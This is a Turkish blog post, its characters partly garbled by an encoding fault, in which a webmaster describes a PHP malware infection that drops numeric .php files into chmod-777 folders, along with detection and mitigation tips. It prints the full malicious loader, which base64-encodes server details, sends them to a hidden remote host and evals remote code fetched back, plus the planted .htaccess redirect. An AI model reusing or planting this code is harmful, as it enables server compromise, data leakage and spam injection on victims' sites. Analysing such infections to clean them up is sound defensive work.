Son günlerde hızla yayılan bu sinsi virüsten etkilenmeyen kalmamıştır sanırım. Sitemdeki garip dosyalardan ÅŸüphelenerek aramaya koyulduÄŸumda bunun bir virüs olduÄŸu sonucuna vardım ve bütün sitelerimi temizledim. Bazı kaynaklara göre cpanel 11 virüsü bazılarına göre chmod 777 virüsü ve bazılarına göre ise sadece bir exploid. Adı herneyse can sıkıcı bir durum.

Sitenize bulaÅŸtığında pekte farkına varamıyorsunuz. Çünkü dizinlerinizde çok masumca bir kaç dosya oluÅŸturuluyor ve ilk bakışta sanki bir error log dosyası gibi pek ÅŸüphe uyandırmıyor.

Virüs CHMOD deÄŸeri 777 olan klasörlere numerik dosyalar oluÅŸturarak server bilgilerinizi çalıyor. ( Örn: 546548.php 1647789.php rakamlar.php).

Numerik dosyaların içeriÄŸi;

< ?php
error_reporting(0);
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
$z = "/?" . base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".e." . base64_encode($i) . "." . base64_encode($j);
$f = base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c) == basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"]) == "51e1225f5f7bca58cb02a7cf6a96dddd")
$f = $_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));
else if($c = file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))
eval($c);
else
{
$cu = curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$o = curl_exec($cu);
curl_close($cu);
eval($o);
};
?>

Yine aynı dizinde, içi boÅŸ WP adında dosya ve birde .htaccess dosyası oluÅŸuyor. .htaccess dosyasının içeriÄŸi ;

.htaccess (dosyasında aşağıdaki kodlar bulunuyor...
Options -MultiViews
ErrorDocument 404 //klasöradı/28090.php

Bu dosyaları oluÅŸturduktan sonra açtığı framelerle sitenizin arka dizinlerinde haberiniz olmadan reklamlar üretiyor ve google bunları aynen siz yapmışsınız gibi indexliyor.

Yukarıdaki resim sitelerimden birinin google indexlerine ait. elz adındaki dizinin chmod deÄŸerleri uzun zamandan beri 777 idi.Ä°çine atılan exploid dosyaları sayesinde yukarıdaki gibi bir tablo oluÅŸmuÅŸ.

Sitenize bulaşıp bulaÅŸmadığını tespit etmek için google'a girin ve ÅŸu ÅŸekilde arama yapın;

site:siteadiniz.com "Name Last modified Size Description"

Åžuan için bu exploid'in ciddi bir çözüm yolu yok. Dizin deÄŸerlerini 777 den aÅŸağı düÅŸürmeniz yararınıza olacaktır. 755 ve aÅŸağısında sisteminize giremiyor.